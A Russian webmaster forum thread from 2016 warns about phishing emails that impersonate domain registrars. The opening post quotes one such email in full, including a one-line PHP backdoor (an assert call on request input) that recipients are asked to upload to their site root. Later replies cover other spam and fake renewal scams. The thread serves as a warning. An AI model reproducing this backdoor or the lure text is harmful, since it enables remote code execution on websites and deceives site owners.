Взлом сайтов от имени регистраторов доменов - Форум успешных вебмастеров

precautions · 23.12.2016, 20:21

В последние 2 дня активизировались хакеры, использующие старый, как дерьмо мамонта, трюк - письмо с поддельным адресом отправителя.

Рассылаются письма от имени nic.ru и <info@r01l.ru> - красным выделена левая буква, которой не будет видно в html-коде письма:

Цитата:

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом *****.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7odfa980f11ce6.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 декабря 2016 года, 22:00 (UTC+04:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

То есть, предлагают самому себе на сайте сделать бэкдор. Наивно, но на всякий случай - не ведитесь.

PS: Похоже, рассылка идёт по доменам в алфавитном порядке, пока ещё работают по букве "a".

Zork · 23.12.2016, 22:32

Такой фигни нет, но пару раз в месяц приходят письма, мол пытаются сбросить пароль. На невнимательность надеются что ли? Было бы чего там тырить, все давно заброшено

веломан · 23.12.2016, 22:38

меня лично заебали спамить pdf-ками буржуйскими с какими-то там отчётами, счетами итп

Kludge · 23.12.2016, 22:52

Цитата:

Сообщение от веломан

меня лично заебали спамить pdf-ками буржуйскими с какими-то там отчётами, счетами итп

В фильме Кибер ясно показано, что это за pdf-ки. Сцена с сотрудником АНБ, где-то в середине фильма.

JetD · 24.12.2016, 00:15

Да, все новое - хорошо забытое старое. И судя по комментам в домейнерских группах в фейсбуках, находятся те, кто на это ведутся.

excl · 24.12.2016, 02:03

Kludge, посмотрел трейлер - фигня какая-то, боевик обычный. Так как там трактуют пдфки?

Skyworker · 24.12.2016, 06:00

Прикольный разводняк, будем иметь ввиду.

Kludge · 24.12.2016, 06:59

excl, ну не совсем обычный. Про хакеров кино. В pdf-ке, что подсунули анбэшнику был клавиатурный шпион от супер секретной программы. Посмотри, неплохой фильм.

DimaX · 24.12.2016, 09:42

Уже пара недель, как идет такая рассылка типа от РуЦентра, даже сам РуЦентр разослал уже предупреждения о ней, мне на пару мыл приходило.

Причем оформлено мыло охеренно, с 1-го взгляда и не поймешь, что это фейк, пока непосредственно в текст не вчитаешься.

А если юзер не шарит (коих большинство), то запросто поведется, блин.

kitvit · 26.12.2016, 13:30

Мне непрерывно льётся говно с ссылками на оплату (.com .net .org) доменов. Смотрят адреса во whois и шлют письма на продление. Идёт рассчёт на идиота. Думаю что находятся такие что оплачивают. Большинство обывателей понятия не имеют от кого пришло письмо, а больше половины не помнят где регистрировали домен и будут рады кликнуть по ссылке куда нужно ввести только свою карточку для пополнения домена. Видимо это как-то так работает.